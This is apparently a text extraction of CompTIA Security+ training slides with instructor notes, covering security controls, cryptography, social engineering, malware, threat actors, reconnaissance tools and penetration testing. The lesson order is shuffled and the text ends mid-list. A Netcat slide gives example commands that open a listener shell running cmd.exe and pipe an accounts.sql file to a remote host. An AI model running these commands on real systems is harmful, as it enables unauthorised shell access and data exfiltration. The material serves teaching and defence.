Comparing Security Roles and Security Controls Lesson 1

Comparing Security Roles and Security Controls
Lesson 1
This lesson aims to establish the context for the security role
and introduce the concepts of security controls and frameworks.
Topics:
Compare and contrast information security roles.
Compare and contrast security control and framework types.
1
Compare and Contrast Information Security Roles
Topic 1A
CompTIA Security+ Lesson 1 | Copyright © 2020 CompTIA
Properties, LLC. All Rights Reserved. | CompTIA.org
2
This topic introduces the concept of the CIA triad and discusses
roles and responsibilities in typical information security teams.
This topic does not align to specific objectives, but it does
cover some terminology from the acronyms list. You can skip
this topic if students are familiar with these basic concepts and
terminology and you would prefer to move quickly to covering
syllabus content.
2
CIA Triad
Confidentiality

Information should only be known to certain people
Integrity
Data is stored and transferred as intended and that any
modification is authorized
Availability
Information is accessible to those authorized to view or modify
it
Non-repudiation
Subjects cannot deny creating or modifying data
Information Security
3
Make sure that students can differentiate the goals of providing
confidentiality, integrity, and availability (and non-
repudiation). Note that the property of availability should not be
overlooked.
An alternative acronym is PAIN (Privacy, Authentication,
Integrity, Non-repudiation). We will discuss security versus
privacy later in the course.
Cybersecurity Framework
4
Use these functions to give students an overview of typical
cybersecurity operations.
Make sure students are familiar with the work of NIST. Note
also that links in the course will often include sites and white

papers with considerable amounts of additional detail. This
detail is not necessary to learn for the exam.
Start to develop the idea that cybersecurity is adversarial in
nature, with threat actors continually seeking new advantages
over defensive systems.
Information Security Competencies
Risk assessments and testing
Specifying, sourcing, installing, and configuring secure devices
and software
Access control and user privileges
Auditing logs and events
Incident reporting and response
Business continuity and disaster recovery
Security training and education programs
5
If appropriate, ask students what security-relevant duties they
have in their current employment.
Information Security Roles and Responsibilities
Overall responsibility
Chief Security Officer (CSO)
Chief Information Security Officer (CISO)
Managerial
Technical
Information Systems Security Officer (ISSO)
Non-technical
Due care/liability
Image credit: Shannon Fagan © 123rf.com.

6
Discuss how responsibility for security might need to be
clarified when there is a specialist security function combining
with the responsibilities of different department managers.
Information Security Business Units
Security Operations Center (SOC)
DevSecOps
Development, security, and operations
Incident response
Cyber incident response team (CIRT)
Computer security incident response team (CSIRT)
Computer emergency response team (CERT)
Image credit: John Mattern/Feature Photo Service for IBM
7
Students should learn this terminology, drawn from the acronym
list. Note the advice in the syllabus document: "Candidates are
encouraged to review the complete list and attain a working
knowledge of all listed acronyms as part of a comprehensive
exam preparation program.“
If appropriate, discuss how the security function is represented
in the students' workplaces. Do any students currently work in a
SOC or participate in DevSecOps projects?
7
Information Security Roles

8
Review Activity
You can either complete the review questions in class with the
students or simply make them aware of them as resources to use
as they review the course material before the exam. Students
can also review additional practice questions from the Practice
tab for the course on the CompTIA Learning Center
(https://www.learn.comptia.org). Note that the exam itself
features multiple-choice questions. A multiple-choice practice
test featuring questions and domain weightings similar to the
actual exam is also available on the CompTIA Learning Center.
8
Assisted Labs
Exploring the Lab Environment
9
Lab Activity
If you are using the CompTIA Labs activities option, these
slides show the suggested point at which to use each activity.
Each activity may be completed independently and skipped or
designated as self-study as you see fit.
The lab series comprises two different types of activity with
different rules for scoring:

Assisted labs confirm knowledge and guide students through the
steps to achieve a given configuration. In an assisted lab,
students may repeat scored items and achieve the correct
answer. Students do not need a correct answer to move forward
through the lab.
Applied labs challenge students’ ability to configure given
settings and display knowledge of concepts, tools, and options
without detailed step instructions . In an applied lab, the student
may not repeat the question or change your answer. The student
does not need a correct answer to move forward through the lab.
The type of activity—assisted or applied—is indicated in the lab
title.
9
Compare and Contrast Security Control and Framework Types
Topic 1B
10
This is an important subject—students need to be able to
distinguish between types of security controls. They will also
often have to work within the compliance requirements of
legislation, regulation, and frameworks.
10
5.1 Compare and contrast various types of controls
5.2 Explain the importance of applicable regulations, standards,
or frameworks that impact organizational security posture
Syllabus Objectives Covered

11
11
Security Control Categories
Technical
Controls implemented in operating systems, software, and
security appliances
Operational
Controls that depend on a person for implementation
Managerial
Controls that give oversight of the system
12
Explain that a control category describes how it is implemented.
For example, a document access policy is managerial, checking
that permissions are applied according to the policy is
operational, and the file system permissions are technical in
nature. As with all classification systems, there is some degree
of overlap, but the classification process is designed to help
assess capabilities compared to frameworks and best practice
guides.
12
Security Control Functional Types (1)
Preventive

Physically or logically restricts unauthorized access
Operates before an attack
Detective
May not prevent or deter access, but it will identify and record
any attempted or successful intrusion
Operates during an attack
Corrective
Responds to and fixes an incident and may also prevent its
reoccurrence
Operates after an attack
13
Images © 123rf.com.
Where the category describes the implementation type, a
functional type describes what the control is deployed to do.
Get the students to nominate examples of different types of
controls:
Preventive—permissions policy, encryption, firewall, barriers,
locks
Detective—alarms, monitoring, file verification
Corrective—incident response policies, data backup, patch
management
13
Physical
Controls such as alarms, gateways, and locks that deter access
to premises and hardware
Deterrent
May not physically or logically prevent access, but
psychologically discourages an attacker from attempting an

intrusion
Compensating
Substitutes for a principal control
Security Control Functional Types (2)
14
Importance of frameworks
Objective statement of current capabilities
Measure progress towards a target capability
Verifiable statement for regulatory compliance reporting
National Institute of Standards and Technology (NIST)
Cybersecurity Framework (CSF)
Risk Management Framework (RMF)
Federal Information Processing Standards (FIPS)
Special Publications
NIST Cybersecurity Framework
15
Businesses might be framework-oriented or they might need to
use a framework because of a legal or regulatory requirement.
Note that we have already looked at the five functions of the
CSF. Risk management is covered later in the course.
ISO and Cloud Frameworks
International Organization for Standardization (ISO)
21K information security standards
31K enterprise risk management (ERM)

Cloud Security Alliance
Security guidance for cloud service providers (CSPs)
Enterprise reference architecture
Cloud controls matrix
Statements on Standards for Attestation Engagements (SSAE)
Service Organization Control (SOC)
SOC2 evaluates service provider
Type I report assesses system design
Type II report assesses ongoing effectiveness
SOC3 public compliance report
16
There is a lot of detail to take in here. Try not to spend too long
in class, but students will need to be able to match the
organizations and frameworks to typical industries and uses.
Benchmarks and Secure Configuration Guides
Center for Internet Security (CIS)
The 20 CIS Controls
CIS-RAM (Risk Assessment Method)
OS/network platform/vendor-specific guides and benchmarks
Vendor guides and templates
CIS benchmarks
Department of Defense Cyber Exchange
NIST National Checklist Program (NCP)
Application servers and web server applications
Client/server
Multi-tier—front-end, middleware (business logic), and back-
end (data)
Open Web Application Security Project (OWASP)

17
Explain the difference between a framework and benchmark.
Note the use of benchmarks for both host/network appliance
deployment (operations) and coding projects (development).
Regulations, Standards, and Legislation
Due diligence
Sarbanes-Oxley Act (SOX)
Computer Security Act (1987)
Federal Information Security Management Act (FISMA)
General Data Protection Regulation (GDPR)
National, territory, or state laws
Gramm–Leach–Bliley Act (GLBA)
Health Insurance Portability and Accountability Act (HIPAA)
California Consumer Privacy Act (CCPA)
Payment Card Industry Data Security Standard (PCI DSS)
18
The syllabus does not list specific examples of legislation, so
these are illustrative rather than comprehensive. Students
should focus on the fact that there can be many different
sources of compliance requirements. Note the difference
between vertical (sector-specific) and horizontal (consumer-
specific, cross-sector) legislation.
Security Control and Framework Types
19

Review Activity
Summary
Lesson 1
20
Check that students are confident about the content that has
been covered. If there is time, revisit any content examples that
they have questions about. If you have used all the available
time for this lesson block, note the issues, and schedule time for
a review later in the course.
Optionally, discuss with students how the concepts from this
lesson could be used within their own workplaces, or how these
principles are already being put into practice.
20
Summarizing Basic Cryptographic Concepts
Lesson 5
1
Compare and Contrast Cryptographic Ciphers
Topic 5A

2
2
2.1 Explain the importance of security concepts in an enterprise
environment (Hashing only)
2.8 Summarize the basics of cryptographic concepts
3
Cryptographic Concepts
Encryption and decryption—encoding and decoding
Plaintext is the unencoded message
Ciphertext is the coded message
Cipher is the means of change or algorithm
Cryptanalysis is the art of cracking cryptographic systems
Meet Alice and Bob (and observe Mallory, lurking)
Hashing algorithms
Encryption ciphers
Symmetric
Asymmetric
4

Hashing Algorithms
Fixed length hash from variable string with cryptographic
properties
One-way (plaintext cannot be recovered from the digest)
Anti-collision (no two plaintexts are likely to produce the same
checksum)
Used for password storage and checksums (integrity)
Secure Hash Algorithm (SHA)
Message Digest Algorithm (MD5)
5
Hashing is not encryption—the process is not reversible
Encryption uses a reversible process based on a secret
Process should be too complex to unravel without the secret
Substitution
Transposition
Cannot keep the cipher/algorithm itself secret
Key ensures ciphertext remains protected even when the
operation of the cipher is known
Protecting the key is easier than protecting the algorithm
Encryption Ciphers and Keys
6

Symmetric Encryption
Same secret key is used for encryption and decryption
Fast—suitable for bulk encryption of large amounts of data
Problem storing and distributing key securely
Confidentiality only— sender and recipient know the same key
7
7
Stream and Block Ciphers
Stream ciphers
Encrypt and decrypt each bit/byte at a time
Must be used with an initialization vector (IV)
Block ciphers
Treat data as equal-size blocks, using padding if necessary
Advanced Encryption Standard (AES/AES256)
Key length
Range of key values is the keyspace
Longer key bit length means a larger keyspace
Strength of key of any given length varies between ciphers
8
8

Asymmetric Encryption
Public/private key pair
If the public key encrypts, only the private key can decrypt
If the private key encrypts, only the public key can decrypt
Private key cannot be derived from the public key
Private key must be kept secret
Public key is easy to distribute (anyone can have it)
Message size is limited to key size so not suitable for large
amounts of data
Used for small amounts of authentication data
9
RSA algorithm (Rivest, Shamir, Adleman)
Basis of many public key cryptography schemes
Trapdoor function
Easy to calculate with the public key, but difficult to reverse
without the private key
Elliptic curve cryptography (ECC)
Concerns about RSA being vulnerable to cryptanalysis
Another type of trapdoor function
Can use smaller keys to obtain same security
Public Key Cryptography Algorithms
10

Cryptographic Ciphers
11
Review Activity
Summarize Cryptographic Modes of Operation
Topic 5B
12
12
13
Digital Signatures
Using public key cryptography with hashing
Digital signatures provide integrity, authentication, non-
repudiation
RSA-based digital signatures
Digital Signature Algorithm (DSA) with ECC cipher

14
Digital Envelopes and Key Exchange
15
Wrapper for a public key to associate it with a digital identity
Identity assertion is validated by a certificate authority (CA) by
signing the certificate
Both parties must trust the CA
Referred to as public key infrastructure (PKI)
Digital Certificates
16
16
RSA key exchange decrypts the session key using the server
private key
The private key stored on the server may be compromised in the
future
If key is compromised, previously captured transmissions could
be deciphered
Perfect forward secrecy (PFS) mitigates this issue
Uses Diffie-Hellman key agreement protocols

Allows two parties to derive the same secret value that an
eavesdropper cannot guess
Perfect Forward Secrecy
17
Cipher Suites and Modes of Operation
Cipher suite
Signature algorithm—proves messages were created by the
server (authentication and integrity)
Key exchange/agreement algorithm—allows client and server to
agree session keys
Bulk encryption cipher—uses the session key to keep the data
confidential
Modes of operation
Use symmetric block cipher with arbitrary length network data
Cipher Block Chaining (CBC)
Combines blocks and an initialization vector (IV) using XOR
operation
Data must be a multiple of block size so requires padding for
last block
Counter mode
Generates keystream with IV and counter
Does not require block padding
18

Authenticated Modes of Operation
Unauthenticated encryption
Secret key encryption cannot prove integrity
Makes cryptographic system vulnerable to insertion and
modification attacks
Authenticated encryption
Message authentication code (MAC)
Create a hash from combination of the message and a shared
secret
Implementations vulnerable to padding oracle attacks
Authenticated encryption with additional data (AEAD)
Counter modes or stream ciphers that do not use padding
Associates message with context to prevent replay
19
Cryptographic Modes of Operation
20
Review Activity
Summarize Cryptographic Use Cases and Weaknesses
Topic 5C

21
21
1.2 Given a scenario, analyze potential indicators to determine
the type of attack
22
Cryptography for Authentication and Non-repudiation
Cryptographic primitives versus cryptographic systems
Authentication and access control
Assuming the private key is secure, an encrypted token could
only have been created by the key holder
Non-repudiation
Sender cannot deny (repudiate) the message as only she/he
could have created it
23
Screenshot used with permission from Microsoft.

Hybrid encryption
Public key cryptography is only efficient with small amounts of
data
Symmetric encryption makes key distribution difficult
Symmetric key is used for bulk encryption and protected by
public key cryptography
File encryption
Private key encrypts the symmetric key
Use of the key is locked to a user account credential
Transport encryption
Session key exchange/agreement
Cryptography Supporting Confidentiality
24
Integrity
Using hash functions and message authentication codes to
validate messages
Resiliency
Using cryptography to ensure authentication and integrity of
control messages
Obfuscation
Make something hard to understand
Encryption can perform this function, but it is very hard to
secure an embedded key
White box cryptography
Cryptography Supporting Integrity and Resiliency
25

Cryptographic Performance Limitations
Limitations
Speed—Amount of data/number of operations per second
Time/latency—Delay in completing an operation
Size—Key size increases security but also CPU/memory
requirements
Computational overhead—Complexity of cryptographic
implementation or cipher
Resource-constrained environments
Low-power devices
Battery-powered systems
Contactless smart cards
Low latency
Delay-sensitive communications protocols/implementations
26
Cryptographic Security Limitations
Entropy
Checksums and ciphertext must reduce order (high entropy)
Weak ciphers and weak keys
Weak implementations
Weak randomness
Predictability and reuse
Nonce

Initialization vector (IV)
Salt
27
How secure are current algorithms?
How long must a ciphertext be resistant to attacks?
Longevity and Cryptographic Attacks
28
Man-in-the-Middle (MitM)
Interferes with the public key presented to the client
Downgrade attack
Forces server into using weak protocol versions and ciphers
Man-in-the-Middle and Downgrade Attacks
29
Key Stretching and Salting
User-generated data is low entropy
Key stretching

Use additional rounds to strengthen keys
Makes attacker do more work so slows down brute force
Salting
Add a random value to each password when hashing it for
storage
Prevents use of pre-computed hash tables
30
Exploit collisions to forge a signature
Math of birthday paradox shows that this might be easier than
expected
Chosen prefix collision attacks
Collisions and the Birthday Attack
31
Cryptographic Use Cases and Weaknesses
32
Review Activity
Summarize Other Cryptographic Technologies

Topic 5D
33
33
34
Quantum computing
Quantum bit (qubits), superpositions, entanglement and coll apse
Quantum computers can keep track of a lot of state data at the
same time
Communications
Tamper-evident key distribution
Post-quantum
Quantum-based cryptanalysis
Post-quantum cryptography (replacements for the current
algorithms)
Lightweight cryptography
Quantum
35
Supports data analytics functions while preserving

confidentiality and privacy
Homomorphic Encryption
36
36
Expanding list of transactional records (blocks)
Each block is linked by hashing
Public ledger
Ledger of transactions performed on a digital asset
Peer-to-peer so transactions are public
Transactions cannot be deleted or reversed
Widely used for cryptocurrencies
Potential uses for financial transactions, online voting systems,
identity management systems, notarization, data storage, …
Blockchain
37
Concealing messages within a covertext
Often uses file data that can be manipulated without introducing
obvious artifacts
Image
Audio
Video
Covert channels
Steganography
38

38
Other Cryptographic Technologies
39
Review Activity
Summary
Lesson 5
40
40
Identifying Social Engineering and Malware
Lesson 4
1
Compare and Contrast Social Engineering Techniques
Topic 4A

2
2
1.1 Compare and contrast different types of social engineering
techniques
3
Social Engineering
“Hacking the human”
Purposes of social engineering
Reconnaissance and eliciting information
Intrusion and gaining unauthorized access
Many possible scenarios
Persuade a user to run a malicious file
Contact a help desk and solicit information
Gain access to premises and install a monitoring device
4
4
Social Engineering Principles

Reasons for effectiveness
Familiarity/liking
Establish trust
Make request seem reasonable and natural
Consensus/social proof
Exploit polite behaviors
Establish spoofed testimonials or contacts
Authority and intimidation
Make the target afraid to refuse
Exploit lack of knowledge or awareness
Scarcity and urgency
Rush the target into a decision
5
5
Impersonation and Trust
Impersonation
Pretend to be someone else
Use the persona to charm or to intimidate
Exploit situations where identity-proofing is difficult
Pretexting
Using a scenario with convincing additional detail
Trust
Obtain or spoof data that supports the identity claim

6
Dumpster diving
Steal documents and media from trash
Tailgating
Access premises covertly
Follow someone else through a door
Piggy backing
Access premises without authorization, but with the knowledge
of an employee
Get someone to hold a door open
Dumpster Diving and Tailgating
7
7
Identity fraud
Impersonation with convincing detail and stolen or spoofed
proofs
Identity fraud versus identity theft
Invoice scams
Spoofing supplier details to submit invoices with false account
details
Credential theft and misuse
Credential harvesting
Shoulder surfing
Lunchtime attack
Identity Fraud and Invoice Scams

8
8
Phishing, Whaling, and Vishing
Trick target into using a malicious resource
Spoof legitimate communications and sites
Spear phishing
Highly targeted/tailored attack
Whaling
Targeting senior management
Vishing
Using a voice channel
SMiShing
Using text messaging
9
Spam, Hoaxes, and Prepending
Spam
Unsolicited email
Email address harvesting
Spam over Internet messaging (SPIM)
Hoaxes
Delivered as spam or malvertising

Fake A-V to get user to install remote desktop software
Phone-based scams
Prepending
Tagging email subject line
Can be used by threat actor as a consensus or urgency technique
Can be added by mail systems to warn users
10
Pharming and Credential Harvesting
Passive techniques have less risk of detection
Pharming
Redirection by DNS spoofing
Typosquatting
Use cousin domains instead of redirection
Make phishing messages more convincing
Watering hole
Target a third-party site
Customer, supplier, hobbies, social media...
Credential harvesting
Attacks focused on obtaining credentials for sale rather than
direct intrusion
Attacks focused on obtaining multiple credentials for single
company
11

Influence Campaigns
Sophisticated threat actors using multiple resources to change
opinions on a mass scale
Soft power
Leveraging diplomatic and cultural assets
Hybrid warfare
Use of espionage, disinformation, and hacking
Social media
Use of hacked accounts and bot accounts
Spread rumor and reinforce messaging
12
Social Engineering Techniques
13
Review Activity
Analyze Indicators of Malware-based Attacks
Topic 4B
14

14
1.2 Given a scenario, analyze potential indicators to determine
the type of attack
4.1 Given a scenario, use the appropriate tool to assess
organizational security (Cuckoo only)
15
Classification by vector or infection method
Viruses and worms
Spread within code without authorization
Trojans
A malicious program concealed within a benign one
Potentially unwanted programs/applications (PUPs/PAPs)
Pre-installed “bloatware” or installed alongside another app
Not completely concealed, but installation may be covert
Also called grayware
Classification by payload
Malware Classification
16
16
Computer Viruses
Rely on some sort of host file or media
Non-resident/file infector

Memory resident
Boot
Script/macro
Multipartite
Polymorphic
Vector for delivery
17
Computer Worms and Fileless Malware
Early computer worms
Propagate in memory/over network links
Consume bandwidth and crash process
Fileless malware
Exploiting remote execution and memory residence to deliver
payloads
May run from an initial script or Trojan
Persistence via the registry
Use of shellcode to create backdoors and download additional
tools
“Living off the land” exploitation of built-in scripting tools
Advanced persistent threat (APT)/advanced volatile threat
(AVT)/
low observable characteristics (LOC)
18

Spyware, Adware, and Keyloggers
Tracking cookies
Adware (PUP/grayware)
Changes to browser settings
Spyware (malware)
Log all local activity
Use of recording devices and screenshots
Redirection
Keylogger
Software and hardware
Screenshot used with permission from ActualKeylogger.com.
19
Backdoors and Remote Access Trojans
Backdoor malware
Remote access trojan (RAT)
Bots and botnets
Command & control (C2 or C&C)
Backdoors from misconfiguration and unauthorized software
Screenshot used with permission from Wikimedia Commons by
CCAS4.0 International.
20

Rootkits
Local administrator versus SYSTEM/root privileges
Replace key system files and utilities
Purge log files
Firmware rootkits
21
Ransomware, Crypto-Malware, and Logic Bombs
Ransomware
Nuisance (lock out user by
replacing shell)
Crypto-malware
High impact ransomware (encrypt data files or drives)
Cryptomining/crypojacking
Hijack resources to mine cryptocurrency
Logic bombs
Image by Wikimedia Commons.
22
Malware Indicators
Browser changes or overt ransomware notification
Anti-virus notifications

Endpoint protection platforms and next-gen A-V
Behavior-based analysis
Sandbox execution
Cuckoo
Resource utilization/consumption
Task Manager and top
File system changes
Registry
Temp files
23
23
Process Analysis
Signature-based detection is failing to identify modern APT-
style tools
Network and host behavior anomalies drive detection methods
Running process analysis
Process Explorer
Logging activity
System Monitor
Network activity
24
Screenshot: Process Explorer docs.microsoft.com/en-
us/sysinternals.

Indicators of Malware-Based Attacks
25
Review Activity
Assisted Lab
Installing, Using, and Blocking a Malware-based Backdoor
26
Lab Activity
Applied Lab
Performing Network Reconnaissance and Vulnerability
Scanning
27
Lab Activity
Summary
Lesson 4
28

28
Explaining Threat Actors and Threat Intelligence
Lesson 2
1
Explain Threat Actor Types and Attack Vectors
Topic 2A
2
2
1.5 Explain different threat actors, vectors and intelligence
sources
3
Vulnerability, Threat, and Risk

4
Attributes of Threat Actors
Known threats versus adversary behaviors
Internal/external
Intent/motivation
Maliciously targeted versus opportunistic
Accidental/unintentional
Level of sophistication
Resources/funding
Adversary capability levels
5
Hackers, Script Kiddies, and Hacktivists
The “Lone Hacker”
White hats versus black hats versus gray hats
Authorized versus non-authorized versus semi-authorized
Script kiddies
Hacker teams and hacktivists
6
State Actors and Advanced Persistent Threats

State-backed groups
Attached to military/secret services
Highly sophisticated
Advanced Persistent Threat (APT)
Espionage and strategic advantage
Deniability
False flag operations
Screenshot used with permission from fireeye.com.
7
Criminal Syndicates and Competitors
Criminal syndicates
Operate across legal jurisdictions
Motivated by criminal profit
Can be very well resourced and funded
Competitors
Cyber espionage
Combine with insider threat
8
8
Insider Threat Actors
Malicious insider threat
Has or has had authorized access

Employees, contractors, partners
Sabotage, financial gain, business advantage
Unintentional insider threat
Weak policies and procedures
Weak adherence to policies and procedures
Lack of training/security awareness
Shadow IT
9
9
Attack Surface and Vectors
Attack surface
Points where an attacker can discover/exploit vulnerabilities in
a network or application
Vectors
Direct access
Removable media
Email
Remote and wireless
Supply chain
Web and social media
Cloud
10
10

Threat Actor Types and Attack Vectors
11
Review Activity
Explain Threat Intelligence Sources
Topic 2B
12
12
1.5 Explain different threat actors, vectors and intelligence
sources
13
Threat Research Sources
Counterintelligence
Tactics, techniques, and procedures (TTPs)
Threat research sources
Academic research
Analysis of attacks on customer systems
Honeypots/honeynets

Dark nets and the dark web
14
14
Threat Intelligence Providers
Narrative analysis and commentary
Reputation/threat data feeds—cyber threat intelligence (CTI)
Platforms and feeds
Closed/proprietary
Vendor websites
Public/private information sharing centers
Open source intelligence (OSINT) threat data sources
OSINT as reconnaissance and monitoring
15
15
Academic journals
Conferences
Request for Comments (RFC)
Social media
Other Threat Intelligence Research Sources

16
16
Tactics, Techniques, and Procedures and Indicators of
Compromise
Tactics, Techniques, and Procedures (TTPs)
Generalized statement of adversary behavior
Campaign strategy and approach (tactics)
Generalized attack vectors (techniques)
Specific intrusion tools and methods (procedures)
Indicator of compromise (IoC)
Specific evidence of intrusion
Individual data points
Correlation of system and threat data
AI-backed analysis
Indicator of attack (IoA)
17
Threat Data Feeds
Structured Threat Information exchange (STIX)
Trusted Automated Exchange of Indicator Information (TAXII)
Automated Indicator Sharing (AIS)
Threat maps
File/code repositories
Vulnerability databases and feeds

18
Icon images © Copyright 2016 Bret Jordan. Licensed under the
Creative Commons Attribution-ShareAlike (CC BY-SA)
License, Version 4.0. (freetaxii.github.io/stix2-icons.html.
18
Correlation between security intelligence/event monitoring and
threat data
Artificial intelligence (AI) and machine learning (ML)
Expert systems
Artificial neural networks (ANN)
Inputs, outputs, and feedback
Objectives and error states
Predictive analysis
Threat forecasting
Monitor “chatter”
Artificial Intelligence and Predictive Analysis
19
19
Threat Intelligence Sources
20
Review Activity

Summary
Lesson 2
21
21
Performing Security Assessments
Lesson 3
1
Assess Organizational Security with Network Reconnaissance
Tools
Topic 3A
2
2
4.1 Given a scenario, use the appropriate tool to assess
organizational security

3
ipconfig, ping, and arp
Footprinting the network layout and rogue system detection
ipconfig/ifconfig/ip
Report the local IP configuration
ping
Test connectivity with a host
Use a ping sweep to detect live hosts on a subnet
arp
Address Resolution Protocol (ARP) cache
Shows IP to Media Access Control (MAC) address mapping
Detect spoofing (validate MAC of default gateway)
4
route and traceroute
route
Show the local routing table
Identify default route and local subnet
Check for suspicious entries
tracert/traceroute
Test the path to a remote host
pathping/mtr
Measure latency

5
IP Scanners and Nmap
Host discovery
Test whether host in IP range responds to probes
Port scan
Test whether TCP or UDP port allows connections
Screenshot used with permission from nmap.org.
6
6
Service discovery
Scan custom TCP/UDP port ranges
Service and version detection
Fingerprinting each port
Protocol
Application/version
OS type
Device type
Service Discovery and Nmap
7
Screenshot used with permission from nmap.org.

netstat and nslookup
netstat
Report port status on local machine
Switches to filter by protocol
Display process name or PID that opened port
nslookup and dig
Query name servers
Zone transfers
8
theHarvester
Collate open source intelligence (OSINT)
dnsenum
Collate DNS hosting information, name records, and IP schemas
scanless
Collate results from third-party port scanning sites
curl
Craft and submit protocol requests
Nessus
Perform automated vulnerability scanning
Other Reconnaissance and Discovery Tools
9

9
Packet analysis versus protocol analysis
Sniffer—tool for capturing network frames
Use software to interact with host network driver
(libpcap/winpcap)
Mirrored ports/switched port analyzer (SPAN)
Use a test access port (TAP) device to read frames from
network media
Placement of sensors
tcpdump
Write to pcap
Read from pcap
Filters
Packet Capture and tcpdump
tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port
80)"
10
Packet Analysis and Wireshark
Output panes
Packet list
Packet details (headers and fields)
Packet bytes (hex and ASCII)
Capture and display filters

Coloring rules
Follow TCP Stream
Screenshot used with permission from wireshark.org.
11
Packet Injection and Replay
Packet injection
Crafting spoofed packets
Dsniff, Ettercap, Scapy
hping
Host/port detection and firewall testing
Traceroute
Denial of service (DoS)
tcpreplay
Stream a packet capture through an interface
Sandbox analysis and intrusion detection testing
12
Exploitation Frameworks
Simulate adversary tools for exploitation and backdoor access
Metasploit
Modules to exploit known code vulnerabilities
Couple exploit module with payload
Obfuscate code to evade detection
Sn1Per
Penetration test reporting and evidence gathering
Run automated suites of tests

Other frameworks
Linux, embedded, browser, web/mobile app, cloud, ….
13
Screenshot used with permission from metasploit.com
13
Simple tool capable of very wide range of network tasks
Port scanning and fingerprinting
Command prompt listener over arbitrary port
File transfer over arbitrary port
Netcat
echo "head" | nc 10.1.0.1 -v 80
nc -l -p 666 -e cmd.exe
type accounts.sql | nc 10.1.0.192 6666
14
14
Organizational Security with Network Reconnaissance Tools
15
Review Activity

Assisted Labs
Scanning and Identifying Network Nodes
Intercepting and Interpreting Network Traffic with Packet
Sniffing Tools
16
Lab Activity
Explain Security Concerns with General Vulnerability Types
Topic 3B
17
17
1.6 Explain the security concerns associated with various types
of vulnerabilities
18
Software Vulnerabilities and Patch Management
Exploits for faults in software code
Applications

Different impacts and exploit scenarios
Client versus server apps
Operating system (OS)
Obtain high level privileges
Firmware
PC firmware
Network appliances and Internet of Things devices
Improper or weak patch management
Undocumented assets
Failed updates and removed patches
19
19
Zero-day
Vulnerability is unknown to the vendor
Threat actor develops an exploit for which there is no patch
Likely to be used against high value targets
Legacy platform
Vendor no longer releases security patches
Zero-day and Legacy Platform Vulnerabilities
20
Default settings
Vendor may not release product in a default-secure
configuration
Unsecured root accounts
Threat actor will gain complete control

Limit ability to login as superuser
Open permissions
Configuration errors allowing unauthenticated access
Allowing write access when only read access is appropriate
Weak Host Configurations
21
21
Weak Network Configurations
Open ports and services
Restrict using an access control list
Disable unnecessary services or block ports
Block at network perimeter
Unsecure protocols
Cleartext data transmissions are vulnerable to snooping and
eavesdropping
Weak encryption
Storage and transport encryption
Key is generated from a weak password
Cipher has weaknesses
Key distribution is not secure
Errors
Error messages that reveal too much information
22
Data breaches and data exfiltration impacts

Data breach is where confidential data is read or transferred
without authorization
Data exfiltration is the methods and tools by which an attacker
transfers data without authorization
Identity theft
Abuse of data from privacy breaches
Data loss and availability loss impacts
Availability is also a critical security property
Financial and reputation impacts
Impacts from Vulnerabilities
23
23
Supply chains
Due diligence
Weak links
Vendor management
Process for selecting suppliers and evaluating risks
System integration
Lack of vendor support
Outsourced code development
Data storage
Cloud-based versus on-premises risks
Third-Party Risks
24

24
Security Concerns with General Vulnerability Types
25
Review Activity
Summarize Vulnerability Scanning Techniques
Topic 3C
26
26
1.7 Summarize the techniques used in security assessments
27
Security Assessment Frameworks
Methodology and scope for security assessments
NIST SP 800-115
Testing
Examining
Interviewing

Vulnerability assessment versus threat hunting and penetration
testing
Vulnerability assessments can use a mix of manual procedures
and automated scanning tools
28
Vulnerability Scan Types
Automated scanners configured with list of known
vulnerabilities
Network vulnerability scanner
Configured with tests for most types of network hosts
Focused on scanning OS plus some desktop and server
applications
Application and web application scanners
Configured with application-specific tests
Screenshot used with permission from Greenbone Networks
(openvas.org).
29
Common Vulnerabilities and Exposures
Vulnerability feed/plug-in/test
Security Content Automation Protocol (SCAP)
Mechanism for updating scanner via feed
Common identifiers

Common Vulnerabilities and Exposures (CVE)
Common Vulnerability Scoring System
(CVSS)ScoreDescription0.1+Low4.0+Medium7.0+High9.0+Crit
ical
30
Intrusive versus Non-intrusive Scanning
Remote scanning versus agent-based scanning
Non-intrusive scanning
Passively test security controls
Scanners attach to network and only sniff traffic
Possibly some low-interaction with hosts (port scanning/banner
grabbing)
Intrusive/active scanning
Establish network session
Agent-based scan
Exploitation frameworks
Highly intrusive/risk of system crash
Used with penetration testing
31
Credentialed versus Non-credentialed Scanning
Non-credentialed
Anonymous or guest
access to host only
Might test default passwords

Credentialed
Scan configured with logon
Can allow privileged access to configuration
settings/logs/registry
Use dedicated account for scanning
32
(openvas.org).
False Positives, False Negatives, and Log Review
Analyzing and validating scan report contents
False positives
Scanner identifies a vulnerability that is not actually present
False negatives
Scanner fails to identify a vulnerability
Review logs to confirm results
33
(openvas.org).
Configuration Review
Lack of controls

Security controls that should be present but are not (or are not
functioning)
Misconfiguration
Settings deviate from template configuration
Driven by templates of configuration settings
Open Vulnerability and Assessment Language (OVAL)
Extensible Configuration Checklist Description Format
(XCCDF)
Compliance-based templates available in many products
34
Use log and threat data to search for IoCs
Advisories and bulletins
Plan threat hunting project in response to newly discovered
threat
Intelligence fusion and threat data
Use security information and event management (SIEM) and
threat data feed to automate searches
Maneuver
Consider possibility of alerting adversary to the search
Use techniques that will give positional advantage
Threat Hunting
35

35
Vulnerability Scanning Techniques
36
Review Activity
Assisted Labs
Analyzing the Results of a Credentialed Vulnerability Scan
37
Lab Activity
Explain Penetration Testing Concepts
Topic 3D
38
38
1.8 Explain the techniques used in penetration testing

39
Penetration Testing
Pen test or ethical hacking
Verify threat
Identify vulnerability and the vector by which it could be
exploited
Bypass security controls
Identify lack of controls or ways to circumvent existing controls
Actively test security controls
Examine weaknesses that render controls ineffective
Exploit vulnerabilities to prove threat exists (“pwned”)
Active and highly intrusive techniques, compared to
vulnerability assessment
40
Rules of Engagement
Agreement for objectives and scope
Authorization to proceed from system owner and affected third-
parties
Attack profile
Black box (unknown environment)
White box (known environment)
Gray box (partially known environment—to model insider threat
agents, for instance)
Bug bounty programs

41
Red team
Performs the offensive role
Blue team
Performs the defensive role
White team
Sets the rules of engagement and monitors the exercise
Purple team
Exercise set up to encourage collaboration
Red and blue teams share information and debrief regularly
Might be assisted by a facilitator
Exercise Types
42
42
Passive and Active Reconnaissance
Pen testing and kill chain attack life cycle
Reconnaissance phase
Passive techniques unlikely to alert target
Active techniques are detectable
Open Source Intelligence (OSINT)
Social engineering
Footprinting
War driving
Drones/unmanned aerial vehicle (UAV) and war flying

43
43
Pen Test Attack Life Cycle
Initial exploitation
Obtain a foothold via an exploit
Persistence
Establish a command & control backdoor
